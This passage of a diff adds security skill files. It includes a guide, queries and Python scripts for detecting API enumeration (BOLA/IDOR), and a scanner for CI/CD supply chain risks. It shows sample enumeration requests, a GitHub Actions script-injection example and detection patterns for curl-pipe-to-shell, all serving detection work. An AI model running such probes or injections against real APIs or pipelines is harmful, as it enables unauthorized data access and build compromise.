+- When SOC analysts need structured procedures for this analysis type
+- When validating security monitoring coverage for related attack techniques
+
+## Prerequisites
+
+- API gateway or reverse proxy with logging enabled (Kong, AWS API Gateway, Apigee)
+- SIEM platform (Splunk, Elastic SIEM, or Microsoft Sentinel)
+- Access to API server logs with request details
+- Web Application Firewall (WAF) with API protection capabilities
+- Understanding of the API's authorization model and object identifier schemes
+
+## Attack Patterns to Detect
+
+### 1. Sequential ID Enumeration
+
+Attackers iterate through numeric or predictable identifiers:
+
+```
+GET /api/v1/users/1001 -> 200 OK
+GET /api/v1/users/1002 -> 200 OK
+GET /api/v1/users/1003 -> 403 Forbidden
+GET /api/v1/users/1004 -> 200 OK
+GET /api/v1/users/1005 -> 200 OK
+...
+```
+
+**Detection Indicators:**
+- Rapid sequential requests to the same endpoint with incrementing IDs
+- Mix of 200/403/401 responses from same source
+- Request rate exceeding normal user behavior
+- Access to resources outside authenticated user's scope
+
+### 2. UUID/GUID Enumeration
+
+Even non-sequential identifiers can be enumerated if leaked through other endpoints:
+
+```
+# Attacker first harvests UUIDs from a list endpoint
+GET /api/v1/posts?page=1  -> Returns post objects with author UUIDs
+
+# Then uses those UUIDs to access restricted user data
+GET /api/v1/users/a3f2c1e4-... -> Private user profile
+GET /api/v1/users/b7d9e8f1-... -> Private user profile
+```
+
+### 3. Parameter Tampering Enumeration
+
+```
+# Authenticated as user_id=100, attempting to access other users' orders
+GET /api/v1/orders?user_id=101
+GET /api/v1/orders?user_id=102
+GET /api/v1/orders?user_id=103
+```
+
+## Detection Rules
+
+### Splunk Detection Queries
+
+```spl
+# Detect sequential ID enumeration on API endpoints
+index=api_logs sourcetype=api_access
+| rex field=uri_path "(?<endpoint>/api/v\d+/\w+/)(?<object_id>\d+)"
+| stats count as request_count,
+        dc(object_id) as unique_ids,
+        values(status_code) as status_codes,
+        min(_time) as first_seen,
+        max(_time) as last_seen
+  by src_ip, endpoint, user_session
+| eval time_span = last_seen - first_seen
+| eval requests_per_second = request_count / max(time_span, 1)
+| where unique_ids > 20 AND requests_per_second > 2
+| eval severity = case(
+    unique_ids > 100, "critical",
+    unique_ids > 50, "high",
+    unique_ids > 20, "medium",
+    1==1, "low"
+  )
+| sort - unique_ids
+| table src_ip, endpoint, unique_ids, request_count, requests_per_second,
+        status_codes, severity
+
+# Detect BOLA via authorization failure patterns
+index=api_logs sourcetype=api_access status_code IN (401, 403)
+| bin _time span=5m
+| stats count as failure_count,
+        dc(uri_path) as unique_paths,
+        values(uri_path) as attempted_paths
+  by _time, src_ip, user_id
+| where failure_count > 10
+| eval attack_type = if(unique_paths > 5, "enumeration", "brute_force")
+```
+
+### Elastic SIEM Detection Rules
+
+```json
+{
+  "rule": {
+    "name": "API Object Enumeration Detection",
+    "description": "Detects rapid sequential access to API objects with mixed authorization results",
+    "type": "threshold",
+    "index": ["api-access-*"],
+    "query": {
+      "bool": {
+        "must": [
+          { "regexp": { "url.path": "/api/v[0-9]+/[a-z]+/[0-9]+" } }
+        ],
+        "should": [
+          { "term": { "http.response.status_code": 200 } },
+          { "term": { "http.response.status_code": 403 } },
+          { "term": { "http.response.status_code": 401 } }
+        ]
+      }
+    },
+    "threshold": {
+      "field": ["source.ip"],
+      "value": 50,
+      "cardinality": [
+        { "field": "url.path", "value": 20 }
+      ]
+    },
+    "schedule": { "interval": "5m" },
+    "severity": "high",
+    "risk_score": 73,
+    "tags": ["OWASP-API1", "BOLA", "Enumeration"]
+  }
+}
+```
+
+### Custom Detection Script
+
+```python
+#!/usr/bin/env python3
+"""API Enumeration Attack Detector
+
+Analyzes API access logs to detect enumeration patterns
+including BOLA, IDOR, and sequential ID probing.
+"""
+
+import re
+import sys
+import json
+from collections import defaultdict
+from datetime import datetime, timedelta
+from dataclasses import dataclass, field
+from typing import List, Dict, Optional
+
+@dataclass
+class AccessRecord:
+    timestamp: datetime
+    source_ip: str
+    user_id: Optional[str]
+    method: str
+    path: str
+    status_code: int
+    object_id: Optional[str] = None
+
+@dataclass
+class EnumerationAlert:
+    source_ip: str
+    user_id: Optional[str]
+    endpoint_pattern: str
+    unique_object_ids: int
+    total_requests: int
+    time_window_seconds: float
+    requests_per_second: float
+    auth_failure_ratio: float
+    severity: str
+    attack_type: str
+    sample_ids: List[str] = field(default_factory=list)
+
+class EnumerationDetector:
+    # Regex patterns for extracting object IDs from API paths
+    ID_PATTERNS = [
+        re.compile(r'/api/v\d+/(\w+)/(\d+)'),           # Numeric IDs
+        re.compile(r'/api/v\d+/(\w+)/([a-f0-9\-]{36})'), # UUIDs
+        re.compile(r'/api/v\d+/(\w+)/([a-zA-Z0-9]{20,})'), # Long alphanumeric IDs
+    ]
+
+    def __init__(self, time_window_minutes: int = 5,
+                 min_unique_ids: int = 15,
+                 max_requests_per_second: float = 5.0):
+        self.time_window = timedelta(minutes=time_window_minutes)
+        self.min_unique_ids = min_unique_ids
+        self.max_rps = max_requests_per_second
+        self.access_log: List[AccessRecord] = []
+
+    def parse_log_line(self, line: str) -> Optional[AccessRecord]:
+        """Parse a common log format line into an AccessRecord."""
+        log_pattern = re.compile(
+            r'(?P<ip>[\d.]+)\s+\S+\s+(?P<user>\S+)\s+'
+            r'\[(?P<time>[^\]]+)\]\s+'
+            r'"(?P<method>\w+)\s+(?P<path>\S+)\s+\S+"\s+'
+            r'(?P<status>\d+)'
+        )
+        match = log_pattern.match(line)
+        if not match:
+            return None
+
+        path = match.group('path')
+        object_id = None
+        for pattern in self.ID_PATTERNS:
+            id_match = pattern.search(path)
+            if id_match:
+                object_id = id_match.group(2)
+                break
+
+        return AccessRecord(
+            timestamp=datetime.strptime(match.group('time'), '%d/%b/%Y:%H:%M:%S %z'),
+            source_ip=match.group('ip'),
+            user_id=match.group('user') if match.group('user') != '-' else None,
+            method=match.group('method'),
+            path=path,
+            status_code=int(match.group('status')),
+            object_id=object_id
+        )
+
+    def analyze(self, records: List[AccessRecord]) -> List[EnumerationAlert]:
+        """Analyze access records for enumeration patterns."""
+        alerts = []
+
+        # Group by source IP and endpoint pattern
+        grouped = defaultdict(list)
+        for record in records:
+            if record.object_id:
+                # Normalize endpoint by removing the specific object ID
+                endpoint = re.sub(r'/[a-f0-9\-]{36}', '/{id}',
+                         re.sub(r'/\d+', '/{id}', record.path))
+                key = (record.source_ip, record.user_id, endpoint)
+                grouped[key].append(record)
+
+        for (src_ip, user_id, endpoint), records_group in grouped.items():
+            if len(records_group) < self.min_unique_ids:
+                continue
+
+            # Sort by timestamp
+            records_group.sort(key=lambda r: r.timestamp)
+
+            # Analyze time windows
+            window_start = 0
+            for window_start in range(len(records_group)):
+                window_records = []
+                for r in records_group[window_start:]:
+                    if r.timestamp - records_group[window_start].timestamp <= self.time_window:
+                        window_records.append(r)
+
+                unique_ids = set(r.object_id for r in window_records)
+                if len(unique_ids) < self.min_unique_ids:
+                    continue
+
+                time_span = (window_records[-1].timestamp -
+                           window_records[0].timestamp).total_seconds()
+                rps = len(window_records) / max(time_span, 1)
+
+                auth_failures = sum(1 for r in window_records
+                                   if r.status_code in (401, 403))
+                failure_ratio = auth_failures / len(window_records)
+
+                # Determine severity
+                if len(unique_ids) > 100:
+                    severity = "critical"
+                elif len(unique_ids) > 50 or failure_ratio > 0.5:
+                    severity = "high"
+                elif len(unique_ids) > 20:
+                    severity = "medium"
+                else:
+                    severity = "low"
+
+                # Determine attack type
+                ids_list = sorted([r.object_id for r in window_records
+                                  if r.object_id and r.object_id.isdigit()])
+                is_sequential = self._check_sequential(ids_list)
+                attack_type = "sequential_enumeration" if is_sequential else "random_enumeration"
+
+                alert = EnumerationAlert(
+                    source_ip=src_ip,
+                    user_id=user_id,
+                    endpoint_pattern=endpoint,
+                    unique_object_ids=len(unique_ids),
+                    total_requests=len(window_records),
+                    time_window_seconds=time_span,
+                    requests_per_second=round(rps, 2),
+                    auth_failure_ratio=round(failure_ratio, 2),
+                    severity=severity,
+                    attack_type=attack_type,
+                    sample_ids=list(unique_ids)[:10]
+                )
+                alerts.append(alert)
+                break  # One alert per group
+
+        return alerts
+
+    def _check_sequential(self, ids: List[str]) -> bool:
+        """Check if numeric IDs follow a sequential pattern."""
+        if len(ids) < 5:
+            return False
+        try:
+            numeric_ids = sorted(int(i) for i in ids)
+            sequential_count = sum(
+                1 for i in range(1, len(numeric_ids))
+                if numeric_ids[i] - numeric_ids[i-1] <= 2
+            )
+            return sequential_count / len(numeric_ids) > 0.7
+        except ValueError:
+            return False
+
+
+def main():
+    detector = EnumerationDetector(
+        time_window_minutes=5,
+        min_unique_ids=15
+    )
+
+    log_file = sys.argv[1] if len(sys.argv) > 1 else "/var/log/api/access.log"
+    records = []
+    with open(log_file, 'r') as f:
+        for line in f:
+            record = detector.parse_log_line(line.strip())
+            if record:
+                records.append(record)
+
+    alerts = detector.analyze(records)
+
+    if alerts:
+        print(f"\n[!] {len(alerts)} enumeration attack(s) detected:\n")
+        for alert in alerts:
+            print(f"  Source IP: {alert.source_ip}")
+            print(f"  User ID: {alert.user_id}")
+            print(f"  Endpoint: {alert.endpoint_pattern}")
+            print(f"  Unique IDs Accessed: {alert.unique_object_ids}")
+            print(f"  Requests/sec: {alert.requests_per_second}")
+            print(f"  Auth Failure Ratio: {alert.auth_failure_ratio}")
+            print(f"  Attack Type: {alert.attack_type}")
+            print(f"  Severity: {alert.severity.upper()}")
+            print(f"  Sample IDs: {alert.sample_ids}")
+            print()
+    else:
+        print("[+] No enumeration attacks detected.")
+
+
+if __name__ == "__main__":
+    main()
+```
+
+## Prevention Controls
+
+### Server-Side Authorization Enforcement
+
+```python
+# Always validate object ownership at the data layer
+def get_user_order(request, order_id):
+    order = Order.objects.get(id=order_id)
+    if order.user_id != request.user.id:
+        raise PermissionDenied("Not authorized to access this order")
+    return order
+```
+
+### Use Unpredictable Identifiers
+
+```python
+import uuid
+
+# Use UUIDs instead of sequential integers
+class Order(Model):
+    id = UUIDField(default=uuid.uuid4, primary_key=True)
+```
+
+### Implement Rate Limiting Per Endpoint
+
+```yaml
+# Kong rate limiting per API route
+plugins:
+  - name: rate-limiting
+    config:
+      minute: 30
+      policy: redis
+      limit_by: credential
+```
+
+## References
+
+- OWASP API1:2023 Broken Object Level Authorization: https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/
+- Traceable.ai BOLA Deep Dive: https://www.traceable.ai/blog-post/a-deep-dive-on-the-most-critical-api-vulnerability----bola-broken-object-level-authorization
+- Cequence BOLA Prevention: https://www.cequence.ai/solutions/bola-and-enumeration-attack-prevention/
+- Cloudflare API Shield BOLA Detection: https://community.cloudflare.com/t/api-shield-new-bola-vulnerability-detection-for-api-shield/883021
+- Sycope IDOR Detection via HTTP Traffic Analysis: https://www.sycope.com/post/idor-vulnerability-how-to-detect-an-attack-on-web-applications-through-http-traffic-analysis

--- a/security/skills/detecting-api-enumeration-attacks/references/api-reference.md
+++ b/security/skills/detecting-api-enumeration-attacks/references/api-reference.md
@@ -1,0 +1,58 @@
+# API Enumeration Attack Detection — API Reference
+
+## Libraries
+
+| Library | Install | Purpose |
+|---------|---------|---------|
+| requests | `pip install requests` | WAF and SIEM API queries |
+
+## Detection Techniques
+
+| Technique | Indicator | Severity |
+|-----------|-----------|----------|
+| Sequential ID enumeration | /api/users/1, /api/users/2, ... | HIGH |
+| Endpoint fuzzing | High 404 rate on /api/* paths | HIGH |
+| Rate abuse | >50 API requests/minute from single IP | MEDIUM |
+| Path discovery | Requests to /swagger, /api-docs, /graphql | HIGH |
+| BOLA/IDOR probing | Access to other users' resource IDs | CRITICAL |
+
+## NGINX Combined Log Format
+
+```
+$remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"
+```
+
+## Common Enumeration Paths
+
+| Pattern | Description |
+|---------|-------------|
+| `/api/v1/users/{id}` | User ID enumeration |
+| `/api/v1/accounts/{uuid}` | Account UUID guessing |
+| `/graphql?query={__schema}` | GraphQL introspection |
+| `/swagger/v1/swagger.json` | API documentation discovery |
+| `/api-docs`, `/.well-known` | Endpoint discovery |
+
+## WAF Rule Categories
+
+| Category | Description |
+|----------|-------------|
+| `rate-limit` | Request rate exceeds threshold |
+| `api-abuse` | Automated API enumeration |
+| `bola` | Broken Object Level Authorization |
+| `scanner` | Known scanner/fuzzer user-agent |
+
+## OWASP API Security Top 10
+
+| ID | Risk |
+|----|------|
+| API1 | Broken Object Level Authorization |
+| API2 | Broken Authentication |
+| API3 | Broken Object Property Level Auth |
+| API4 | Unrestricted Resource Consumption |
+| API5 | Broken Function Level Authorization |
+
+## External References
+
+- [OWASP API Security Top 10](https://owasp.org/API-Security/)
+- [OWASP Testing Guide — API Testing](https://owasp.org/www-project-web-security-testing-guide/)
+- [ModSecurity API Protection Rules](https://coreruleset.org/)

--- a/security/skills/detecting-api-enumeration-attacks/scripts/agent.py
+++ b/security/skills/detecting-api-enumeration-attacks/scripts/agent.py
@@ -1,0 +1,196 @@
+#!/usr/bin/env python3
+"""API enumeration attack detection agent."""
+
+import json
+import sys
+import argparse
+import re
+from datetime import datetime
+from collections import defaultdict
+
+try:
+    import requests
+except ImportError:
+    print("Install: pip install requests")
+    sys.exit(1)
+
+
+ENUMERATION_PATTERNS = [
+    re.compile(r"/api/v\d+/users/\d+", re.IGNORECASE),
+    re.compile(r"/api/v\d+/accounts/[a-f0-9-]+", re.IGNORECASE),
+    re.compile(r"/api/v\d+/orders/\d+", re.IGNORECASE),
+    re.compile(r"/graphql.*introspection", re.IGNORECASE),
+    re.compile(r"/(admin|internal|debug|swagger|api-docs)", re.IGNORECASE),
+]
+
+SEQUENTIAL_THRESHOLD = 10
+RATE_THRESHOLD = 50
+
+
+def parse_access_log(log_path):
+    """Parse NGINX/Apache combined log format for API requests."""
+    log_pattern = re.compile(
+        r'(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d+) \d+'
+    )
+    entries = []
+    with open(log_path, "r") as f:
+        for line in f:
+            m = log_pattern.match(line)
+            if m:
+                entries.append({
+                    "ip": m.group(1),
+                    "timestamp": m.group(2),
+                    "method": m.group(3),
+                    "path": m.group(4),
+                    "status": int(m.group(5)),
+                })
+    return entries
+
+
+def detect_sequential_ids(entries):
+    """Detect sequential ID enumeration in API paths."""
+    id_pattern = re.compile(r"/(\d+)(?:/|$|\?)")
+    ip_sequences = defaultdict(list)
+    for entry in entries:
+        m = id_pattern.search(entry["path"])
+        if m:
+            ip_sequences[entry["ip"]].append(int(m.group(1)))
+
+    findings = []
+    for ip, ids in ip_sequences.items():
+        if len(ids) < SEQUENTIAL_THRESHOLD:
+            continue
+        sorted_ids = sorted(ids)
+        sequential_count = sum(1 for i in range(1, len(sorted_ids))
+                               if sorted_ids[i] - sorted_ids[i-1] == 1)
+        if sequential_count >= SEQUENTIAL_THRESHOLD:
+            findings.append({
+                "ip": ip,
+                "issue": f"Sequential ID enumeration detected ({sequential_count} sequential IDs)",
+                "severity": "HIGH",
+                "sample_ids": sorted_ids[:20],
+                "total_requests": len(ids),
+            })
+    return findings
+
+
+def detect_rate_anomalies(entries, window_seconds=60):
+    """Detect abnormal request rates per IP to API endpoints."""
+    ip_counts = defaultdict(int)
+    ip_404s = defaultdict(int)
+    ip_401s = defaultdict(int)
+    for entry in entries:
+        if "/api/" in entry["path"]:
+            ip_counts[entry["ip"]] += 1
+            if entry["status"] == 404:
+                ip_404s[entry["ip"]] += 1
+            elif entry["status"] == 401:
+                ip_401s[entry["ip"]] += 1
+
+    findings = []
+    for ip, count in ip_counts.items():
+        if count > RATE_THRESHOLD:
+            findings.append({
+                "ip": ip,
+                "issue": f"High API request rate ({count} requests)",
+                "severity": "MEDIUM",
+                "total_requests": count,
+                "404_count": ip_404s.get(ip, 0),
+                "401_count": ip_401s.get(ip, 0),
+            })
+        if ip_404s.get(ip, 0) > 20:
+            findings.append({
+                "ip": ip,
+                "issue": f"Excessive 404s on API ({ip_404s[ip]} not-found responses)",
+                "severity": "HIGH",
+                "detail": "Possible endpoint discovery/fuzzing",
+            })
+    return findings
+
+
+def detect_path_enumeration(entries):
+    """Detect API path/endpoint enumeration patterns."""
+    ip_paths = defaultdict(set)
+    for entry in entries:
+        ip_paths[entry["ip"]].add(entry["path"].split("?")[0])
+
+    findings = []
+    for ip, paths in ip_paths.items():
+        for pattern in ENUMERATION_PATTERNS:
+            matched = [p for p in paths if pattern.search(p)]
+            if len(matched) > 5:
+                findings.append({
+                    "ip": ip,
+                    "issue": f"Path enumeration pattern: {pattern.pattern}",
+                    "severity": "HIGH",
+                    "matched_paths": len(matched),
+                    "samples": list(matched)[:5],
+                })
+    return findings
+
+
+def query_waf_logs(waf_url, api_key, hours=24):
+    """Query WAF API for blocked enumeration attempts."""
+    headers = {"Authorization": f"Bearer {api_key}"}
+    try:
+        resp = requests.get(f"{waf_url}/api/v1/events",
+                            params={"hours": hours, "rule_category": "api-abuse"},
+                            headers=headers, timeout=15)
+        resp.raise_for_status()
+        return resp.json().get("events", [])
+    except Exception as e:
+        return [{"error": str(e)}]
+
+
+def run_audit(args):
+    """Execute API enumeration detection audit."""
+    print(f"\n{'='*60}")
+    print(f"  API ENUMERATION ATTACK DETECTION")
+    print(f"  Generated: {datetime.utcnow().isoformat()} UTC")
+    print(f"{'='*60}\n")
+
+    report = {}
+
+    if args.log_file:
+        entries = parse_access_log(args.log_file)
+        report["total_log_entries"] = len(entries)
+        print(f"Parsed {len(entries)} log entries from {args.log_file}\n")
+
+        seq_findings = detect_sequential_ids(entries)
+        report["sequential_id_findings"] = seq_findings
+        print(f"--- SEQUENTIAL ID ENUMERATION ({len(seq_findings)} findings) ---")
+        for f in seq_findings[:10]:
+            print(f"  [{f['severity']}] {f['ip']}: {f['issue']}")
+
+        rate_findings = detect_rate_anomalies(entries)
+        report["rate_findings"] = rate_findings
+        print(f"\n--- RATE ANOMALIES ({len(rate_findings)} findings) ---")
+        for f in rate_findings[:10]:
+            print(f"  [{f['severity']}] {f['ip']}: {f['issue']}")
+
+        path_findings = detect_path_enumeration(entries)
+        report["path_findings"] = path_findings
+        print(f"\n--- PATH ENUMERATION ({len(path_findings)} findings) ---")
+        for f in path_findings[:10]:
+            print(f"  [{f['severity']}] {f['ip']}: {f['issue']}")
+
+    return report
+
+
+def main():
+    parser = argparse.ArgumentParser(description="API Enumeration Detection Agent")
+    parser.add_argument("--log-file", help="Access log file to analyze")
+    parser.add_argument("--waf-url", help="WAF API URL for event queries")
+    parser.add_argument("--waf-key", help="WAF API key")
+    parser.add_argument("--output", help="Save report to JSON file")
+    args = parser.parse_args()
+
+    report = run_audit(args)
+    if args.output:
+        with open(args.output, "w") as f:
+            json.dump(report, f, indent=2, default=str)
+        print(f"\n[+] Report saved to {args.output}")
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/detecting-supply-chain-attacks-in-ci-cd/SKILL.md
+++ b/security/skills/detecting-supply-chain-attacks-in-ci-cd/SKILL.md
@@ -1,0 +1,91 @@
+---
+name: detecting-supply-chain-attacks-in-ci-cd
+description: 'Scans GitHub Actions workflows and CI/CD pipeline configurations for
+  supply chain attack vectors including unpinned actions, script injection via expressions,
+  dependency confusion, and secrets exposure. Uses PyGithub and YAML parsing for automated
+  audit. Use when hardening CI/CD pipelines or investigating compromised build systems.
+
+  '
+domain: cybersecurity
+subdomain: security-operations
+tags:
+- supply-chain-security
+- ci-cd-security
+- github-actions
+- pipeline-security
+- dependency-pinning
+- devsecops
+version: '1.0'
+author: mahipal
+license: Apache-2.0
+atlas_techniques:
+- AML.T0010
+- AML.T0104
+nist_ai_rmf:
+- GOVERN-5.2
+- MAP-1.6
+- MANAGE-2.2
+nist_csf:
+- DE.CM-01
+- RS.MA-01
+- GV.OV-01
+- DE.AE-02
+mitre_attack:
+- T1195.002
+- T1195.001
+- T1199
+- T1554
+---
+
+# Detecting Supply Chain Attacks in CI/CD
+
+
+## When to Use
+
+- When investigating security incidents that require detecting supply chain attacks in ci cd
+- When building detection rules or threat hunting queries for this domain
+- When SOC analysts need structured procedures for this analysis type
+- When validating security monitoring coverage for related attack techniques
+
+## Prerequisites
+
+- Familiarity with security operations concepts and tools
+- Access to a test or lab environment for safe execution
+- Python 3.8+ with required dependencies installed
+- Appropriate authorization for any testing activities
+
+## Instructions
+
+Scan CI/CD workflow files for supply chain risks by parsing GitHub Actions YAML,
+checking for unpinned dependencies, script injection vectors, and secrets exposure.
+
+```python
+import yaml
+from pathlib import Path
+
+for wf in Path(".github/workflows").glob("*.yml"):
+    with open(wf) as f:
+        workflow = yaml.safe_load(f)
+    for job_name, job in workflow.get("jobs", {}).items():
+        for step in job.get("steps", []):
+            uses = step.get("uses", "")
+            if uses and "@" in uses and not uses.split("@")[1].startswith("sha"):
+                print(f"Unpinned action: {uses} in {wf.name}")
+```
+
+Key supply chain risks:
+1. Unpinned GitHub Actions (using @main instead of SHA)
+2. Script injection via ${{ github.event }} expressions
+3. Overly permissive GITHUB_TOKEN permissions
+4. Third-party actions with write access to repo
+5. Dependency confusion via public/private package name collision
+
+## Examples
+
+```python
+# Check for script injection in run steps
+for step in job.get("steps", []):
+    run_cmd = step.get("run", "")
+    if "${{" in run_cmd and "github.event" in run_cmd:
+        print(f"Script injection risk: {run_cmd[:80]}")
+```

--- a/security/skills/detecting-supply-chain-attacks-in-ci-cd/references/api-reference.md
+++ b/security/skills/detecting-supply-chain-attacks-in-ci-cd/references/api-reference.md
@@ -1,0 +1,55 @@
+# API Reference: Detecting Supply Chain Attacks in CI/CD
+
+## GitHub Actions Workflow Parsing
+
+```python
+import yaml
+
+with open(".github/workflows/ci.yml") as f:
+    wf = yaml.safe_load(f)
+
+# Key fields
+wf["permissions"]           # Workflow-level permissions
+wf["jobs"]["build"]["steps"] # Step list
+step["uses"]                # Action reference (owner/repo@ref)
+step["run"]                 # Shell script
+step["env"]                 # Environment variables
+```
+
+## Supply Chain Risk Patterns
+
+| Risk | Pattern | Severity |
+|------|---------|----------|
+| Unpinned action | `uses: owner/action@main` | CRITICAL |
+| Mutable tag | `uses: owner/action@v1` | MEDIUM |
+| Script injection | `run: echo ${{ github.event.issue.title }}` | CRITICAL |
+| Write permissions | `permissions: write-all` | HIGH |
+| Curl pipe bash | `RUN curl \| bash` | HIGH |
+| Latest image tag | `FROM image:latest` | MEDIUM |
+
+## Dependency Confusion Check
+
+```python
+import requests
+# Check if private package exists on public registry
+resp = requests.get(f"https://registry.npmjs.org/{pkg}")
+exists = resp.status_code == 200
+
+resp = requests.get(f"https://pypi.org/pypi/{pkg}/json")
+exists = resp.status_code == 200
+```
+
+## Pinning Actions to SHA
+
+```yaml
+# Bad: mutable reference
+uses: actions/checkout@main
+# Good: pinned to commit SHA
+uses: actions/checkout@8ade135a41bc03ea155e62e844d188df1ea18608
+```
+
+### References
+
+- GitHub Actions security hardening: https://docs.github.com/en/actions/security-guides
+- StepSecurity: https://github.com/step-security/harden-runner
+- Dependency confusion: https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610

--- a/security/skills/detecting-supply-chain-attacks-in-ci-cd/scripts/agent.py
+++ b/security/skills/detecting-supply-chain-attacks-in-ci-cd/scripts/agent.py
@@ -1,0 +1,201 @@
+#!/usr/bin/env python3
+"""Agent for detecting supply chain attacks in CI/CD pipelines."""
+
+import re
+import json
+import argparse
+from pathlib import Path
+from datetime import datetime
+
+import yaml
+import requests
+
+
+def scan_workflow_file(workflow_path):
+    """Scan a single GitHub Actions workflow file for supply chain risks."""
+    with open(workflow_path) as f:
+        workflow = yaml.safe_load(f)
+    if not workflow or not isinstance(workflow, dict):
+        return []
+    findings = []
+    permissions = workflow.get("permissions", {})
+    if permissions == "write-all" or (isinstance(permissions, dict) and
+                                      permissions.get("contents") == "write"):
+        findings.append({
+            "file": str(workflow_path),
+            "issue": "Overly permissive workflow permissions",
+            "severity": "HIGH",
+            "detail": f"permissions: {permissions}",
+        })
+    for job_name, job in workflow.get("jobs", {}).items():
+        for i, step in enumerate(job.get("steps", [])):
+            uses = step.get("uses", "")
+            if uses:
+                findings.extend(check_action_pinning(str(workflow_path), job_name, uses))
+            run_cmd = step.get("run", "")
+            if run_cmd:
+                findings.extend(check_script_injection(str(workflow_path), job_name, run_cmd))
+            env_vars = step.get("env", {})
+            for key, val in (env_vars or {}).items():
+                if isinstance(val, str) and "${{" in val and "secrets." in val:
+                    if "run" in step:
+                        findings.append({
+                            "file": str(workflow_path),
+                            "job": job_name,
+                            "issue": "Secret passed to environment variable in run step",
+                            "severity": "MEDIUM",
+                            "detail": f"{key}={val[:60]}",
+                        })
+    return findings
+
+
+def check_action_pinning(filepath, job_name, uses):
+    """Check if a GitHub Action is pinned to a commit SHA."""
+    findings = []
+    if "@" not in uses:
+        return findings
+    ref = uses.split("@")[1]
+    if re.match(r'^[0-9a-f]{40}$', ref):
+        return findings
+    if ref in ("main", "master", "latest"):
+        findings.append({
+            "file": filepath,
+            "job": job_name,
+            "issue": f"Action pinned to mutable branch: {uses}",
+            "severity": "CRITICAL",
+        })
+    elif re.match(r'^v\d+', ref):
+        findings.append({
+            "file": filepath,
+            "job": job_name,
+            "issue": f"Action pinned to mutable tag: {uses}",
+            "severity": "MEDIUM",
+            "recommendation": "Pin to full commit SHA instead of tag",
+        })
+    return findings
+
+
+def check_script_injection(filepath, job_name, run_cmd):
+    """Check for script injection via GitHub context expressions."""
+    findings = []
+    injection_patterns = [
+        r"\$\{\{\s*github\.event\.issue\.title",
+        r"\$\{\{\s*github\.event\.issue\.body",
+        r"\$\{\{\s*github\.event\.pull_request\.title",
+        r"\$\{\{\s*github\.event\.pull_request\.body",
+        r"\$\{\{\s*github\.event\.comment\.body",
+        r"\$\{\{\s*github\.event\.review\.body",
+        r"\$\{\{\s*github\.head_ref",
+    ]
+    for pattern in injection_patterns:
+        if re.search(pattern, run_cmd):
+            findings.append({
+                "file": filepath,
+                "job": job_name,
+                "issue": f"Script injection via untrusted input",
+                "severity": "CRITICAL",
+                "pattern": pattern,
+                "detail": run_cmd[:100],
+            })
+    return findings
+
+
+def scan_directory(directory):
+    """Scan all workflow files in a directory."""
+    all_findings = []
+    workflow_dir = Path(directory) / ".github" / "workflows"
+    if not workflow_dir.exists():
+        workflow_dir = Path(directory)
+    for wf in workflow_dir.glob("*.yml"):
+        all_findings.extend(scan_workflow_file(str(wf)))
+    for wf in workflow_dir.glob("*.yaml"):
+        all_findings.extend(scan_workflow_file(str(wf)))
+    return all_findings
+
+
+def check_dependency_confusion(package_name, registry="npm"):
+    """Check if a private package name exists on public registries."""
+    urls = {
+        "npm": f"https://registry.npmjs.org/{package_name}",
+        "pypi": f"https://pypi.org/pypi/{package_name}/json",
+    }
+    url = urls.get(registry)
+    if not url:
+        return {"exists_publicly": False}
+    try:
+        resp = requests.get(url, timeout=10)
+        return {
+            "package": package_name,
+            "registry": registry,
+            "exists_publicly": resp.status_code == 200,
+            "severity": "HIGH" if resp.status_code == 200 else "INFO",
+        }
+    except requests.RequestException:
+        return {"package": package_name, "exists_publicly": False}
+
+
+def scan_dockerfile(dockerfile_path):
+    """Scan Dockerfile for supply chain risks."""
+    findings = []
+    with open(dockerfile_path) as f:
+        lines = f.readlines()
+    for i, line in enumerate(lines, 1):
+        stripped = line.strip()
+        if stripped.startswith("FROM") and ":latest" in stripped:
+            findings.append({
+                "file": str(dockerfile_path),
+                "line": i,
+                "issue": "Using :latest tag in FROM",
+                "severity": "MEDIUM",
+                "detail": stripped,
+            })
+        if "curl" in stripped and "| sh" in stripped or "| bash" in stripped:
+            findings.append({
+                "file": str(dockerfile_path),
+                "line": i,
+                "issue": "Piping curl output to shell",
+                "severity": "HIGH",
+                "detail": stripped[:100],
+            })
+    return findings
+
+
+def main():
+    parser = argparse.ArgumentParser(description="CI/CD Supply Chain Attack Detection Agent")
+    parser.add_argument("--directory", default=".", help="Repository root to scan")
+    parser.add_argument("--check-packages", nargs="*", help="Package names to check for confusion")
+    parser.add_argument("--output", default="supply_chain_report.json")
+    parser.add_argument("--action", choices=[
+        "workflows", "dockerfiles", "packages", "full_scan"
+    ], default="full_scan")
+    args = parser.parse_args()
+
+    report = {"generated_at": datetime.utcnow().isoformat(), "findings": {}}
+
+    if args.action in ("workflows", "full_scan"):
+        wf_findings = scan_directory(args.directory)
+        report["findings"]["workflow_risks"] = wf_findings
+        print(f"[+] Workflow risks found: {len(wf_findings)}")
+
+    if args.action in ("dockerfiles", "full_scan"):
+        df_findings = []
+        for df in Path(args.directory).rglob("Dockerfile*"):
+            df_findings.extend(scan_dockerfile(str(df)))
+        report["findings"]["dockerfile_risks"] = df_findings
+        print(f"[+] Dockerfile risks found: {len(df_findings)}")
+
+    if args.action in ("packages", "full_scan") and args.check_packages:
+        pkg_results = []
+        for pkg in args.check_packages:
+            pkg_results.append(check_dependency_confusion(pkg))
+        report["findings"]["dependency_confusion"] = pkg_results
+        public = [p for p in pkg_results if p.get("exists_publicly")]
+        print(f"[+] Dependency confusion risks: {len(public)}")
+
+    with open(args.output, "w") as f:
+        json.dump(report, f, indent=2, default=str)
+    print(f"[+] Report saved to {args.output}")
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/exploiting-broken-function-level-authorization/SKILL.md
+++ b/security/skills/exploiting-broken-function-level-authorization/SKILL.md
@@ -1,0 +1,382 @@
+---
+name: exploiting-broken-function-level-authorization
+description: 'Tests APIs for Broken Function Level Authorization (BFLA) vulnerabilities
+  where regular users can invoke administrative functions or access privileged API
+  endpoints by directly calling them. The tester identifies admin and privileged endpoints,
+  then attempts to access them with regular user credentials by manipulating HTTP
+  methods, URL paths, and request parameters. Maps to OWASP API5:2023 Broken Function
+  Level Authorization. Activates for requests involving BFLA testing, admin endpoint
+  bypass, function-level access control testing, or API privilege escalation.
+
+  '
+domain: cybersecurity
